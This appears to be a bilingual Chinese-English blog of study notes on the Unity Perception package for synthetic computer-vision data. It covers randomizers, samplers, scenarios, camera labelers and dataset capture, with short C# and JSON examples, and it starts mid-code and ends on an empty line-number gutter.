    var nested = new FlatFrameMessageBuilder(m_Endpoint, m_Frame);
    if (nestedValue.ContainsKey(key))
    {
    Debug.LogWarning($"Report data with key [{key}] will be overridden by new values");
    }

    nestedValue[key] = nested;
    return nested;
    }

    /// <summary>
    /// 将 IMessageBuilder 的输出作为键为 <see cref="arraykey"/> 的数组元素添加。
    /// Adds the output of an IMessageBuilder as an element of an array identified by the key <see cref="arraykey"/>.
    /// </summary>
    public override IMessageBuilder AddNestedMessageToVector(string arraykey)
    {
    if (!nestedArrays.TryGetValue(arraykey, out var nestedList))
    {
    nestedList = new List<JsonMessageBuilder>();
    nestedArrays[arraykey] = nestedList;
    }
    var nested = new FlatFrameMessageBuilder(m_Endpoint, m_Frame);
    nestedList.Add(nested);
    return nested;
    }

    // A tensor is a multi-dimensional array
    public override void AddTensor(string key, Tensor tensor)
    {
    // By default, write the tensor as a flattened array
    // 默认情况下,将张量写为一个扁平化的数组。
    currentJToken[key] = new JArray(tensor.buffer);
    }
    }
    }

    Metadata Labeler

    ]]>
    + 大纲

    Fundamentals

    FeatureDescription
    Perception CameraCaptures RGB images and ground truth from a Camera
    从 Camera 捕获 RGB 图像和 ground truth
    SOLO SchemaSchema for annotation, metric, and ground-truth data for the default SOLO endpoint
    SOLO 形式的 annotation, metric, ground-truth 数据
    LabelingA component that marks a GameObject and its descendants with a set of labels
    用一组标签标记 GameObject 及其子对象的组件
    Label ConfigAn asset that defines a taxonomy of labels for ground truth generation
    定义用于生成 ground truth 的标签分类的 asset
    RandomizationThe Randomization tool set lets you integrate domain randomization principles into your simulation.
    随机化
    FAQFrequently Asked Questions about common workflows and issues.
    常见问题及解答
    Legacy Perception SchemaSchema for annotation, metric, and ground-truth data for the legacy Perception endpoint
    Legacy Perception 形式的 annotation, metric, ground-truth 数据

    Labeling

    FeatureDescription
    LabelingA component that marks a GameObject and its descendants with a set of labels
    用一组标签标记 GameObject 及其子对象的组件
    [Label Config](#Label Config)An asset that defines a taxonomy of labels for ground truth generation
    定义用于生成 ground truth 的标签分类的 asset
    [Bounding Box 2D Labeler](#Bounding Box 2D Labeler)Capture 2D bounding boxes for visible labeled objects.
    捕获可见标记对象的 2D 边界框
    [Hierarchical Bounding Boxes](#Hierarchical Bounding Boxes)How to combine bounding boxes of objects with parent-child hierarchical relationships during runtime.
    如何在运行时将具有父子层次关系的对象的边界框组合在一起
    [Bounding Box 3D Labeler](#Bounding Box 3D Labeler)Capture 3D bounding boxes for visible labeled objects.
    捕获可见标记对象的三维边界框
    [Keypoint Labeler](#Keypoint Labeler)Record the screen locations of specific points on labeled objects such as keypoints on humans.
    记录标记对象上特定点的屏幕位置,例如人身上的关键点
    [Metadata Labeler](#Metadata Labeler)Reporting object-level or environment-level metadata information during runtime.
    在运行时报告对象级别或环境级别的元数据信息

    Randomization

    FeatureDescription
    RandomizationThe Randomization toolset lets you integrate domain randomization principles into your simulation.
    随机化
    ScenariosScenarios control execution flow of your simulation – how many iterations to run the simulation, what randomizers to use, etc.
    场景控制模拟的执行流程——运行模拟的迭代次数,使用什么随机化器等
    RandomizersRandomizers encapsulate specific randomization activities to perform during the lifecycle of a randomized simulation.
    随机化器封装了要在随机化模拟的生命周期中执行的特定随机化活动
    [Randomizer Tags](#Randomizer Tags)RandomizerTags are the primary mechanism by which Randomizers query for a certain subset of GameObjects to randomize within a simulation.
    RandomizerTags 是随机化器查询游戏对象的某个子集以在模拟中随机化的主要机制
    ParametersParameters are classes that utilize Samplers to deterministically generate random typed values.
    Parameters 是利用 Samplers 确定地生成随即类型值的类
    SamplersSamplers generate bounded random float values by sampling from probability distributions.
    Samplers 通过从概率分布中采样来生成有界随机浮点值

    Data Generation

    FeatureDescription
    [Perception Camera](#Perception Camera)Captures RGB images and ground truth from a Camera.
    从 Camera 捕获 RGB 图像和 ground truth
    [Dataset Capture](#Dataset Capture)Ensures sensors are triggered at proper rates and accepts data for the JSON dataset.
    确保传感器以正确的速率触发,并接受 JSON 数据集的数据
    [Output Endpoint](#Output Endpoint)Currently supported output endpoints are: No Output, Perception endpoint, and Solo endpoint.
    当前支持的输出端点有:No OutputPerception 端点和 Solo 端点
    [Metadata Labeler](#Metadata Labeler)Reporting object-level or environment-level metadata information during runtime.
    在运行时报告对象级别或环境级别的元数据信息

    资源

    ​ 原文档:com.unity.perception/index.md at main · Unity-Technologies/com.unity.perception · GitHub

    API

    Labeling

    Label Config

    Bounding Box 2D Labeler

    Hierarchical Bounding Boxes

    Bounding Box 3D Labeler

    Keypoint Labeler

    Metadata Labeler

    Randomization

    ​ Randomization 工具集集成了合成数据集中随机化的功能:

    1. 提供了用于随机化的 Parameters
    2. 提供了从 Parameters 中挑选随机值的 Samplers
    3. 提供了协调完整随机化过程的 Scenarios

    ​ 随机化的步骤:

    1. 创建 Scenario
    2. 定义 Randomizers 并将其添加到 Scenario 中
    3. 在 Randomizers 里设置好 Parameters 和 Samplers
    4. 生成用于 CV 的随机化训练数据

    Scenarios

    ​ 预先定义好的 Fixed Length Scenario 加载在场景的一个空对象中:

    jpg

    ​ Scenarios 有三个任务:

    1. 控制模拟的执行流
    2. 组织 Randomizers 列表
    3. 定义可以从构建的 Unity 播放器外部配置的设置

    ​ 默认情况下,Perception 包括一个现成的 Scenario,即 FixedLengthScenario 类。此场景针对固定数量的帧运行每次迭代,以创建指定大小的数据集。

    Scenario Lifecycle Hooks

    ​ Scenarios 有许多在执行过程中调用的生命周期挂钩。下面是一张图表,显示了典型 scenario 运行的操作序列:

    png

    JSON Configuration

    ​ 场景可以序列化为 JSON,在运行时进行修改和导入,以配置模拟行为,即使在构建了 Unity 播放器之后也是如此。默认情况下,可以使用场景检查器上的 Generate JSON Config 按钮序列化以下场景设置:

    1. Scenario 常量
    2. Randomizers 和 Parameters 上的字符串、数字和布尔字段
    3. Constant,Uniform,Normal 采样器的配置

    ​ 以下是如何使用--Scenario-config-file 将场景 JSON 配置加载到 Windows Unity 播放器的示例:.\PerceptionTutorial.exe --scenario-config-file scenarioConfiguration.json

    Implementing Custom Scenarios

    ​ 对于场景应该针对任意数量的帧运行的用例,可能需要实现自定义场景。以下是用户可能想要覆盖以实现自定义场景迭代条件的两个最常见的场景属性:

    1. isScenarioReadyToStart - 定义确定场景何时可以开始迭代的条件
    2. isIterationComplete - 定义确定场景迭代结束的条件
    3. isScenarioComplete - 定义确定场景停止迭代的条件

    Abstract Scenario Classes

    ​ 在派生自定义场景时,根据您的需求,有两个抽象场景类可供选择。以下是这些选项的列表,以及何时可以为您的用例派生它们:

    1. Scenario<T>:如果只需要基本的场景生命周期协调工具,这是要派生的最基本的场景类
    2. PerceptionScenario<T>:感知场景抽象类为打算利用 perception 包的数据捕获工具生成数据集的场景引入了一些有用的功能。

    Scenario Constants

    ​ 常量包括配置场景生命周期设置的属性,如起始迭代值或总迭代计数。通过派生自己的常量类,您可以添加自己的自定义场景设置来配置不同的场景属性。以下是FixedLengthScenario类中使用的 Constants 类的示例:

    1
    2
    3
    4
    5
    6
    [Serializable]
    public class Constants : ScenarioConstants
    {
    public int totalIterations = 100;
    public int framesPerIteration = 1;
    }
    1. 请确保在常量类上包含 [Serializable] 特性。这将确保可以从 Unity inspector 正确配置常量。
    2. Scenario 类的 SerializeToJson()DeserializeFromJson() 方法可以重写以实现自定义序列化策略。

    Randomizers

    Randomizers 封装了在随机模拟执行期间要执行的特定随机化活动。例如,存在用于 spawning objects(生成对象)、repositioning(重新定位灯光)、varying the color of objects(更改对象颜色)等的 Randomizers。Randomizers 将 random parameters 公开到其 inspector interface,以进一步自定义这些变化。用户可以将一组 Randomizers 添加到 Scenario 中,以便定义模拟生命周期中要执行的随机化活动的有序列表。

    要定义一个全新的 Randomizer,请派生 Randomizer 类并实现下面一节中列出的一个或多个方法,以便在模拟运行时随机化游戏对象。

    jpg

    添加到 Scenario 类中的 Randomizer

    Randomizer Hooks

    1. OnCreate() - called when the Randomizer is added or loaded to a Scenario 将 Randomizer 添加或加载到 Scenario 时调用
    2. OnIterationStart() - called at the start of a new Scenario Iteration 在 Scenario 迭代开始时调用
    3. OnIterationEnd() - called the after a Scenario Iteration has completed 在 Scenario 迭代完成后调用
    4. OnScenarioComplete() - called the after the entire Scenario has completed 在整个 Scenario 完成后调用
    5. OnStartRunning() - called on the first frame a Randomizer is enabled 在启动 Randomizer 的第一帧调用
    6. OnStopRunning()- called on the first frame a disabled Randomizer is updated 更新第一帧时,关闭 Randomizer
    7. OnUpdate() - executed every frame for enabled Randomizers 为启用的 Randomizer 执行每帧

    Randomizer Coding Example

    ​ 以下是 Perception 软件包中包含的 rotation Randomizer 示例的代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    [Serializable]
    [AddRandomizerMenu("Perception/Rotation Randomizer")]
    public class RotationRandomizer : Randomizer
    {
    public Vector3Parameter rotation = new Vector3Parameter();

    protected override void OnIterationStart()
    {
    var taggedObjects = tagManager.Query<RotationRandomizerTag>();
    foreach (var taggedObject in taggedObjects)
    taggedObject.transform.rotation = Quaternion.Euler(rotation.Sample());
    }
    }

    Randomizer Library


    Light Randomizer:以所有绑定 Light RandomizerTag 的对象为目标。

    Light Randomizer Tag:必须绑定在有 Light 组件的 GameObject 上。

    ​ 可以随机化的参数:

    1. 可以开关的可能性
    2. 灯光强度
    3. 灯光温度
    4. 灯光颜色

    Material Property Randomizer(材质特性随机化器): 以所有绑定 Material Property Randomizer Tag 的对象为目标。

    Material Property Randomizer Tag: 必须绑定在有一种 Renderer(MeshRenderer, BillboardRenderer 等)组件的 GameObject 上。

    ​ 对于选定材质的着色器,指定要修改哪些着色器属性以及在哪些范围之间进行修改。


    Material Swapper:以所有绑定 Material Swapper Tag 的对象为目标。

    Material Swapper Tag: 必须绑定在有 Material 组件的 GameObject 上。

    ​ 给定一个材质列表,在每次迭代中,将给定 GameObject 的材质与列表中的一个采样材质进行交换。


    Scene Randomizer:给定一个场景列表,每 n 次迭代从列表中加载一个场景。

    ​ 列表中的任何 scenes 都不应具有 scenario 组件,因为一次只能有一个 scenario 组件处于活动状态。启动组件的 scenario 中指定的随机化器将持续存在,并作用于新加载的场景中的对象。


    Sky Randomizer: 以所有绑定 Skybox Randomizer Tag 的对象为目标。

    Sky Randomizer Tag: 必须绑定在有 Volume 组件(?)的 GameObject 上。


    Substance Randomizer:以所有绑定 Substance Randomizer Tag 的对象为目标。

    Substance Randomizer Tag:必须绑定在有 SubstanceGraph 组件的 GameObject 上。

    ​ 好像很高级,还不太稳定,少用吧。(没有接触过 SubstanceGraph 这个组件)


    Transform Randomizer:以所有绑定 Transform Randomizer Tag 的对象为目标。

    Transform Randomizer Tag:任何 GameObject 上都可绑定。

    1. Translation 平移
      1. 是否启用
      2. 平移范围
      3. 平移是相对平移还是绝对平移(直接设置坐标值)
    2. Rotation 旋转
      1. 是否启用
      2. 旋转范围
      3. 旋转是相对旋转还是绝对旋转(直接设置旋转角)
    3. Scale 缩放
      1. 是否启用
      2. 缩放范围
      3. Uniformly scaled?(是否所有轴都具有相同的随机化值)
      4. 缩放是相对缩放还是绝对缩放(直接设置缩放值)

    Volume Randomizer:以所有绑定 Volume Randomizer Tag 的对象为目标。

    Volume Randomizer Tag:必须绑定在有 Volume 组件的 GameObject 上。


    ​ 从可用的后处理效果列表中,可以随机化哪些效果以及每个后处理效果的特定参数。

    1. Bloom–阈值、强度、散射

    2. 曝光 Exposure–补偿

    3. 景深 Depth of Field–近焦起点和终点,远焦起点和末端

    4. 相机类型 Camera Type–相机规格列表(焦距、传感器尺寸、镜头偏移、门配合等)

    5. 运动模糊 Motion Blur–强度、最小速度、最大速度

    6. 镜头失真 Lens Distortion–强度、X和Y倍增、中心、比例

    Randomizer Tags

    RandomizerTags 是随机化器查询游戏对象的某个子集以在模拟中随机化的主要机制。更具体地说,RandomizerTags 是可以添加到 GameObjects 的组件,以便在活动场景的 TagManager 中注册它们。该 TagManager 可以识别场景中所有带有标记的对象,并且可以查询以查找包含特定标记的所有 GameObjects。下面是一个简单的示例,ColorRandomizer 使用 ColorRandomizerTag 查询所有游戏对象,它将对其应用随机材质基础颜色:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    [Serializable]
    [AddRandomizerMenu("Perception/Color Randomizer")]
    public class ColorRandomizer : Randomizer
    {
    static readonly int k_BaseColor = Shader.PropertyToID("_BaseColor");

    public ColorHsvaParameter colorParameter;

    protected override void OnIterationStart()
    {
    var taggedObjects = tagManager.Query<ColorRandomizerTag>();
    foreach (var taggedObject in taggedObjects)
    {
    var renderer = taggedObject.GetComponent<MeshRenderer>();
    renderer.material.SetColor(k_BaseColor, colorParameter.Sample());
    }
    }
    }

    ​ RandomizerTag 还可以用于自定义随机化器如何将其随机化应用于特定游戏对象。

    Parameters

    ​ Parameters 通常被定义为 Randomizer 类的字段,但它们也可以像任何其他 C# 类一样实例化:

    1
    2
    3
    4
    // Create a color Parametervar
    var colorParameter = new HsvaColorParameter();
    // Generate one color sample
    var color = colorParameter.Sample();

    ​ 请注意,Parameters 与 Samplers 一样,为 Sample() 方法的每次调用生成新的随机值:

    1
    2
    3
    var color1 = colorParameter.Sample();
    var color2 = colorParameter.Sample();
    Assert.AreNotEqual(color1, color2);

    ​ 所有参数都派生自 Parameter 抽象类。此外,Perception 软件包类型中包含的参数源自两个专门的参数基类:

    1. CategoricalParameter 类别参数
    2. CategoricalParameter 数值参数

    ​ **在 Randomizers 以外使用 Parameters(MonoBehaviours and ScriptableObjects): **将公共参数字段添加到 MonoBehaviorScriptableObject 后,您可能已经注意到参数的 UI 看起来与添加到随机化器时不同。这是因为大多数 Perception 随机化组件的 Inspector UI 都是使用 Unity 相对较新的 UI Elements 框架编写的,尽管在默认情况下,Unity 使用旧的 IMGUI 框架来呈现默认的检查器编辑器。

    假设您有以下具有公共 GameObjectParameter 字段的 CustomMonoBehavior

    1
    2
    3
    4
    5
    6
    7
    using UnityEngine;
    using UnityEngine.Perception.Randomization.Parameters;

    public class CustomMonoBehaviour : MonoBehaviour
    {
    public GameObjectParameter prefabs;
    }

    ​ **Categorical Parameters: **Categorical Parameters 从没有内在排序的选项列表中选择一个值。例如,材质参数从材质选项列表中随机选择,但材质选项列表本身可以按任何特定顺序重新排列,而不会影响选定材质的分布。

    **​ Numeric Parameters: **Numeric Parameters 使用采样器生成随机化结构。查看Perception包中包含的 ColorHsvaParameter 类,了解如何实现 Numeric Parameters 的示例。

    Samplers

    Perception 包中的采样器是根据有界概率分布确定地生成随机浮点值的类。尽管 Samplers 通常与 Parameters 一起用于生成类型化随机值的数组,但采样器可以从任何普通脚本中实例化和使用。Perception 软件包中包含了一些采样器。


    **Constant Sampler: **生成一个常数:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    var sampler = new ConstantSampler();

    // set sampled value to be 25
    sampler.value = 25;

    // Generate a sample
    var sample = sampler.Sample(); // returns 25
    var sample2 = sampler.Sample(); // returns 25
    var sample3 = sampler.Sample(); // returns 25

    **Uniform Sampler: **均匀分布:

    1
    2
    3
    4
    5
    6
    7
    var sampler = new UniformSampler();

    // generate values between the range 5 and 15
    sampler.range = new FloatRange(5, 15);

    // Generate a sample
    var sample = sampler.Sample(); // value between 5 and 15

    png


    **Normal Sampler: **正态分布:

    从由指定范围限定的截断正态分布生成随机样本。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    var sampler = new NormalSampler();

    // in statistics, often denoted by µ 均值
    sampler.mean = 10;
    // in statistics, often denoted by σ 标准差
    sampler.stdDev = 2;
    // cut-off values below -20 and above 20 截断
    sampler.range = new FloatRange(-20, 20);

    // Generate a sample
    var sample = sampler.Sample();

    png


    **Animation Curve Sampler: **

    Animation Curve 是 Unity 的内置功能,而不是 Perception 里的内容。

    ​ 根据用户提供的“Animation Curve”表示的范围和概率分布对值进行采样。动画曲线的 X 轴对应于该采样器将从中拾取的值,而 Y 轴对应于这些值的相对概率。相对概率(Y 轴)不需要在 1 时最大化,因为只有曲线的形状才重要。然而,Y 值不能为负(即可能为负的值)。

    1
    2
    3
    4
    5
    6
    7
    var sampler = new AnimationCurveSampler();

    // create an animation curve programattically
    sampler.distributionCurve = AnimationCurve.EaseInOut(0, 1, 1, 100);

    // Generate a sample
    var sample = sampler.Sample();

    ​ 通过在 Inspector 中公开上面的 Sampler 变量并使用 Unity 的 UI 在曲线上添加和编辑点,可以更容易地创建动画曲线。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    // Unity UI handles curve creation
    public AnimationCurve myDistributionCurve;

    ...

    void myFunction() {
    var sampler = new AnimationCurveSampler();

    // public variable containing the AnimationCurve
    sampler.distributionCurve = myDistributionCurve;

    // Generate a sample
    var sample = sampler.Sample();
    }

    Sampler 生成由活动场景的当前随机状态设定种子的随机值。更改场景的随机种子将导致 Sampler 生成不同的值。更改 SamplerParametersRandomizers的顺序也会导致在模拟过程中采样不同的值。建议用户不要在模拟中使用 UnityEngine.Rom 类或 System.random 类生成随机值,因为这两个类都可能生成不确定或种子不正确的随机值。仅使用 Perception 采样器生成随机值将有助于确保 Perception 模拟在本地执行期间和云中的 Unity 模拟上生成一致的结果。

    Perception Camera

    Perception Camera 组件是绑在 Camera 上的:

    jpg

    Properties

    Property:Function:
    DescriptionA description of the Camera to be registered in the JSON dataset.
    要在 JSON 数据集中注册的 Camera 的描述。
    Show VisualizationsDisplay realtime visualizations for labelers that are currently active on this camera.
    显示此 camera 上当前活动的 labelers 的实时可视化。
    Capture RGB ImagesWhen you enable this property, Unity captures RGB images as PNG files in the dataset each frame.
    启用此属性时,Unity 会在每帧的数据集中捕获 RGB 图像作为 PNG 文件。
    Capture Trigger ModeThe method of triggering captures for this camera. In Scheduled mode, captures happen automatically based on a start frame and frame delta time. In Manual mode, captures should be triggered manually through calling the RequestCapture method of PerceptionCamera.
    触发此 camera 捕获的方法。在 Scheduled(计划)模式下,捕获会根据开始帧和帧增量时间自动进行。在 Manual(手动)模式下,应通过调用 PerceptionCameraRequestCapture 方法手动触发捕获。
    Override Layer MaskWhen this property is enabled, labelers will utilize the layer mask on the Perception Camera instead of the culling mask on the camera when rendering objects during data capture. This override particularly affects object culling during segmentation image rendering.
    启用此属性后,在数据捕获期间渲染对象时,labelers 将使用 Perception Camera 上的 layer mask,而不是相机上的 culling mask。此覆盖特别影响分割图像渲染过程中的对象剔除。
    Sensor TypeThe Camera Sensor selected for producing pixel based ground truth data.
    为生成基于像素的 ground truth 数据而选择的摄像机传感器。
    Layer MaskThe layer mask used by labelers when the Override Layer Mask field is enabled.
    启用 Override Layer Mask 字段时,labelers 使用的层遮罩。
    Alpha ThresholdThe minimum level of transparency required for a pixel to be rendered in segmentation images.
    在分割图像中渲染像素所需的最低透明度级别。
    Camera LabelersA list of labelers that generate data derived from this Camera.
    从该相机生成数据的 labelers 列表。

    Properties for Scheduled Capture Mode

    Property:Function:
    Simulation Delta TimeThe simulation frame time (seconds) for this camera.
    此相机的模拟帧时间(秒)。
    E.g. 0.0166 translates to 60 frames per second.
    例如,0.0166 转换为每秒 60 帧。
    This will be used as Unity’s Time.captureDeltaTime, causing a fixed number of frames to be generated for each second of elapsed simulation time regardless of the capabilities of the underlying hardware. For more information on sensor scheduling, see DatasetCapture.
    导致无论底层硬件的功能如何,每秒经过的模拟时间都会生成固定数量的帧。
    First Capture FrameFrame number at which this camera starts capturing.
    此相机开始拍摄时的帧序号。
    Frames Between CapturesThe number of frames to simulate and render between the camera’s scheduled captures. Setting this to 0makes the camera capture every frame.
    在摄影机的计划捕获之间要模拟和渲染的帧数。将此设置为 0 将使相机捕捉每一帧。

    Properties for Manual Capture Mode

    Property:Function:
    Affect Simulation TimingHave this camera affect simulation timings (similar to a scheduled camera) by requesting a specific frame delta time. Enabling this option will let you set the Simulation Delta Time property described above.
    通过请求特定的帧增量时间,使此摄影机影响模拟计时(类似于 scheduled camera)。启用此选项可以设置上述 Simulation Delta Time 属性。

    Output Resolution

    使用 Unity Editor 生成数据集时,Perception Camera 生成的图像的分辨率将与编辑器的游戏视图设置的分辨率相匹配。但是,使用 built players 生成的图像(包括 local builds 和 Unity Simulation runs)将使用项目设置中指定的分辨率。(这句话应该是指编译后的程序?)

    jpg

    Unity Editor

    jpg

    Resolution and Presentation

    Accumulation

    Accumulation 允许您使用需要多个帧才能获得最终结果的渲染技术。例如路径跟踪或累积运动模糊。

    Camera Sensors

    可以为 Perception Cameras 实现自定义相机传感器,以控制如何为所有支持的通道类型(RGB、实例分割、法线、深度等)执行渲染。可以使用 Perception Camera 组件检查器中的 Sensor Type 字段配置为 Perception 相机选择的特定传感器。

    Unity Camera Sensor

    Unity 摄像头传感器是 Perception Cameras 上选择的默认传感器。这种传感器类型使用户能够捕获 Perception camera 游戏对象上配置的摄像头组件输出的数据。该传感器上的“超级采样因子”字段通知相机以原始宽度和高度的 2 倍、4 倍或 8 倍(分别为分辨率的 4 倍、16 倍或 64 倍)捕获图像,以执行高质量的超级采样抗锯齿(SSAA)效果。该效果使用子像素平均来生成更平滑的输出图像,渲染几何体边缘周围的混叠伪影更少,有时纹理中的小细节周围的混迭也会得到改善。请注意,无论该传感器上配置的特定超级采样设置如何,该传感器的输出分辨率都不会改变。

    Camera Labelers

    Camera labelers 在 JSON 数据集中捕获与相机相关的数据。您可以使用这些数据来训练模型和进行数据集统计。Perception 软件包提供了多个 CameraLabeler,您可以从 CameraLabeler 类派生来定义更多的 labelers。

    Semantic Segmentation Labeler

    png

    SemanticSegmentationLabeler 使用附加的 Camera 生成 2D RGB 图像。Unity 使用 SemanticSegmentationLabelingConfiguration 中与标签关联的颜色绘制对象。如果 Unity 找不到对象的标签,它会将其绘制为黑色。

    Instance Segmentation Labeler

    **Instance Segmentation Labeler(实例分割标注器)**使用附加的摄影机生成 2D RGB 图像。Unity 使用唯一的颜色绘制标记对象的每个实例。

    Bounding Box 2D Labeler

    png

    BoundingBox2DLabeler 为每个具有在 IdLabelConfig 中定义的标签的可见对象生成二维边界框。Unity 使用渲染图像计算边界框,因此它仅排除对象的遮挡部分或框外部分

    Bounding Box 3D Labeler

    Bounding Box 3D Labeler 为场景中每个标记的游戏对象生成 3D 地面实况边界框。与 2D 边界框不同,3D 边界框是根据场景中标记的网格计算的,并且会记录所有对象(与它们的遮挡状态无关

    ***注意:***边界框 3D Labeler 仅支持非嵌套蒙皮网格渲染器对象。

    Object Count Labeler

    1
    2
    3
    4
    5
    {
    "label_id": 25,
    "label_name": "drink_whippingcream_lucerne",
    "count": 1
    }

    ObjectCountLabeler 记录您在 IdLabelConfig 中定义的每个标签的对象计数。Unity 仅记录 Camera 帧中至少有一个可见像素的对象。

    Rendered Object Info Labeler

    1
    2
    3
    4
    5
    {
    "label_id": 24,
    "instance_id": 320,
    "visible_pixels": 28957
    }

    RenderedObjectInfoLabeler 记录相机图像中可见的所有对象的列表,包括它们的实例 ID、解析的标签 ID 和可见像素计数。如果 Unity 无法将对象解析为 IdLabelConfig 中的标签,则不会记录这些对象。

    Keypoint Labeler

    **Keypoint labeler(关键点标注器)**捕捉已标记游戏对象上特定点的屏幕位置。此 Labeler 的典型用途是捕捉人体姿态估计数据,但它可以用于捕捉任何类型对象上的点。Labeler 使用关键点模板,该模板定义要为模型捕获的关键点以及这些关键点之间的骨架连接。关键点的位置记录在像素坐标中。

    Occlusion Labeler

    1
    2
    3
    4
    5
    6
    {
    "instanceId": 1,
    "percentVisible": 0.25,
    "percentInFrame": 0.5,
    "visibilityInFrame": 0.5
    }

    **Occlusion Labeler(遮挡标注器)**为帧内可见的每个对象报告一组可见性度量。每组包含 3 个指标:

    1. 可见百分比 Percent Visible:对象的可见部分。
    2. 帧内百分比 Percent In Frame:对象未被摄影机帧遮挡的部分。
    3. 帧内可见性 Visibility In Frame:帧内对象部分的未遮挡部分。
    4. $percentVisible = percentInFrame\times visibilityInFrame$

    Depth Labeler

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    "annotations": [
    {
    "@type": "type.unity.com/unity.solo.DepthAnnotation",
    "id": "Depth",
    "sensorId": "camera",
    "description": "Generates a 32-bit depth image in EXR format where each pixel contains the actual distance in Unity units (usually meters) from the camera to the object in the scene.",
    "imageFormat": "Exr",
    "dimension": [
    736.0,
    483.0
    ],
    "filename": "step0.camera.Depth.exr"
    }
    ]
    深度帧的度量输出示例

    **Depth Labeler(深度标注器)**以 EXR 格式输出 32 位深度图像。每个像素包含从摄影机到场景中对象的实际距离,单位为 Unity units(通常为米)。深度值直接写入 R 通道。

    深度图可以用 RenderDoc 软件来打开。

    Normal Labeler

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    "annotations": [
    {
    "@type": "type.unity.com/unity.solo.NormalAnnotation",
    "id": "Normal",
    "sensorId": "camera",
    "description": "Produces an image capturing the vertex normals of objects within the frame.",
    "imageFormat": "Exr",
    "dimension": [
    736.0,
    483.0
    ],
    "filename": "step0.camera.Normal.exr"
    }
    ]

    **Normal Labeler(法线标注器)**捕捉 3 通道图像中对象的顶点法线。此法线图像使用 EXR 格式进行编码。图像的 RGB 通道分别存储每个顶点法线像素的 XYZ 分量。

    Environment Labeler

    **Environment Labeler(环境标签器)**生成有关场景环境的信息,例如其标记对象的层次。

    Available Information

    标签层次结构(Label Hierarchy)–标签层次结构(JSON 中的 hierarchy 字段)提供了由实例 ID 唯一标识的标记对象之间的父子关系。用户可以决定是只为可见对象生成标签层次,还是为场景中的所有对象生成标签层级。禁用的对象始终被忽略。

    Annotation Example
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    {
    "@type": "type.unity.com/unity.solo.EnvironmentStateMetric",
    "id": "environment",
    "sensorId": "",
    "annotationId": "",
    "description": "Captures details about the environment such as label hierarchy",
    "hierarchy": [
    {
    "instance_id": 1,
    "parent_instance_id": null,
    "child_instance_ids": [ 3, 4]
    },
    {
    "instance_id": 5,
    "parent_instance_id": 2,
    "child_instance_ids": []
    },
    {
    "instance_id": 2,
    "parent_instance_id": null,
    "child_instance_ids": [5]
    }
    ]
    }

    Pixel Position Labeler

    Pixel Position Labeler 以像素输出从摄影机到对象的摄影机空间距离。输出是 EXR 格式的图像文件,对每个像素进行以下编码。想象一个向量 $v_{AB}=(x,y,z)$,从相机到像素 $(A,B)$ 的

    红色通道–向量 $v_{AB}$ 的 $x$ 分量

    绿色通道–向量 $v_{AB}$ 的 $y$ 分量

    蓝色通道-向量 $v_{AB}$ 的 $z$ 分量

    Alpha 通道–始终设置为 1

    Metadata Labeler

    在帧的末尾,这个 labeler 从场景中的所有 MetadataTags 中获取数据,并将其记录到结果 JSON 中的 metadata 部分。

    Included metadata tags
    • LabelingNameMetadataTag
      • 添加有关 GameObject 名称的信息
      • 如何添加数据的简单示例 Frame JSON 数据
    • LabelingTagMetadataTag
      • 添加有关 GameObject 标签的信息
      • 添加数据的一个简单示例 Frame JSON 数据
    • LightMetadataTag
      • 添加有关灯光强度和颜色的信息
      • 这是如何注入场景相关的示例帧 JSON 数据中的信息
    • LabelingChildNameMetadataTag
      • 将子对象的名称报告给父数据
      • 如何将不同对象的数据分组到同一报告的示例
    • LabelingDistanceToMainCameraMetadataTag
      • 报告从游戏对象到主相机的距离
      • 如何对报告进行任何 Unity Engine 计算的简单示例
    • LabelingKeyValuesMetadataTag
      • 增加了通过 Unity 编辑器添加自定义字符串的可能性
      • 这是如何通过 Unity Editor 添加自定义信息的示例
    • LabelingTransformDataMetadataTag
      • -添加了关于 GameObject 转换的信息
      • 这是一个如何添加选择信息的可能性的示例,以包括在 Unity Editor 中的 Frame JSON 数据中
    1. 继承 LabelMetadataTag

    2. 实现所需的抽象方法

      2.1 键-序列化 JSON 文件中对象的名称

      2.2 GetReportedValues(IMessageBuilder-builder)-通过 builder 将此处所需的任何信息添加到 builder 中。add(“object_name”,data_to_be_addd>)。将组件添加到带有标签的 GameObject 组件

    3. 将组件添加到带有标签的 GameObject 组件

    Limitations

    ​ ground truth 并不与所有渲染功能兼容,尤其是那些修改帧中对象的可见性或形状的渲染功能。

    生成 ground truth 时:

    • Unity 不运行顶点和几何体着色器
    • Unity 不会运行后处理效果,HDRP 中的内置镜头失真除外

    Dataset Capture

    DatasetCapture 跟踪 sensorsannotationsmetrics,并将数据传递到激活的 endpoint。它还控制每帧经过的模拟时间,以适应激活的 sensors


    这段代码是一个自定义的相机标记器 CameraLabeler,用于在场景中添加标记 labels 和测量 metrics ,以用于训练和评估模型。

    在 Perception Camera 中,Label 通常用于标记场景中的物体,如人、车、建筑等,以及它们的属性,如类别、大小、颜色等等。这些信息可以通过标记器(labeler)进行添加或修改,并且可以用于训练和评估机器学习模型。

    而 Metric 则是用于测量场景中某些物理量或者训练和评估过程中的指标,如灯光的位置、物体的速度、模型的精度等等。这些信息可以被记录下来,以便后续对场景展开更深入的数据分析和挖掘。相比于 Label,Metric 更关注于数值上的精确度和可重复性,可以帮助开发者更好地分析和改进算法表现。

    总之,Label 是场景中物体的标记,而 Metric 是场景中物理量或者模型性能的测量。两者各有不同的应用场景和意义,但都可以作为机器学习和计算机视觉任务的关键信息来源。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
